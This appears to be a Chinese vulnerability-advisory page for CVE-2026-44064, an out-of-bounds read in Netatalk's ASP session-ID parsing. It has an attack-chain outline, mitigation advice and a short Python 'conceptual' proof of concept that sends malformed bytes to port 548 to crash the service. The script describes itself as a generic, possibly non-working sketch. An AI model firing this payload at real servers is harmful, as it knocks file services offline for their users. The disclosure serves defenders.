CVE-2026-44064 CVSS 7.1 高危

CVE-2026-44064 Netatalk越界读取漏洞

披露日期: 2026-05-21

来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号

CVE-2026-44064

漏洞类型

越界读取

CVSS评分

7.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Netatalk

漏洞概述

Netatalk 1.3至4.4.2版本在处理ASP会话ID时存在越界读取漏洞。未经身份验证的邻接网络攻击者可通过发送特制的ASP请求包，利用该漏洞越界读取内存数据，从而获取有限敏感信息或触发服务异常终止，导致拒绝服务。

技术细节

该漏洞主要归因于Netatalk在解析AppleTalk Session Protocol (ASP) 数据包中的会话ID字段时，缺少严格的长度或边界校验机制。位于同一局域网（邻接网络）的攻击者无需进行用户认证，即可向目标Netatalk服务端口发送特制的畸形ASP请求。当服务端尝试处理该请求并读取会话ID时，由于程序逻辑缺陷，会发生越界内存读取操作。这种行为可能导致攻击者访问非预期的内存地址，从而泄露有限的敏感上下文信息。此外，如果读取操作触发了无效的内存访问，将导致服务进程异常终止，造成拒绝服务。

攻击链分析

STEP 1

1. 信息收集

攻击者在局域网内扫描并识别运行Netatalk服务的目标主机。

STEP 2

2. 漏洞利用

攻击者向目标主机的ASP服务端口发送特制的恶意请求包，其中包含引发越界读取的会话ID数据。

STEP 3

3. 效果达成

目标服务在处理请求时发生越界内存读取，导致服务崩溃（拒绝服务）或泄露内存中的敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Conceptual PoC for CVE-2026-44064
# Target: Netatalk 1.3 - 4.4.2
def trigger_poc(target_ip, target_port):
    # Crafted payload with malformed Session ID to trigger OOB read
    # Adjust payload structure based on specific protocol analysis
    header = b"\x00\x04"  # Example ASP command header
    # Malformed session ID buffer causing OOB read
    malformed_session_id = b"\xFF" * 256  
    payload = header + malformed_session_id

    try:
        print(f"[*] Sending payload to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        s.send(payload)
        print("[*] Payload sent. Check if service crashed.")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    trigger_poc("192.168.1.100", 548)

影响范围

Netatalk 1.3

Netatalk 1.4

Netatalk 1.5

Netatalk 1.6

Netatalk 2.x

Netatalk 3.x

Netatalk 4.0

Netatalk 4.1

Netatalk 4.2

Netatalk 4.3

Netatalk 4.4.0

Netatalk 4.4.1

Netatalk 4.4.2

防御指南

临时缓解措施

由于该漏洞属于邻接网络攻击，建议在无法立即升级的情况下，通过防火墙或ACL策略限制对Netatalk服务端口（默认为548）的访问，仅允许可信的管理终端或必要的主机进行连接，从而减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-44064
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-44064
3 Details https://www.cvedetails.com/cve/CVE-2026-44064/
4 VulDB https://vuldb.com/cve/CVE-2026-44064
5 Link https://netatalk.io/security/CVE-2026-44064

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表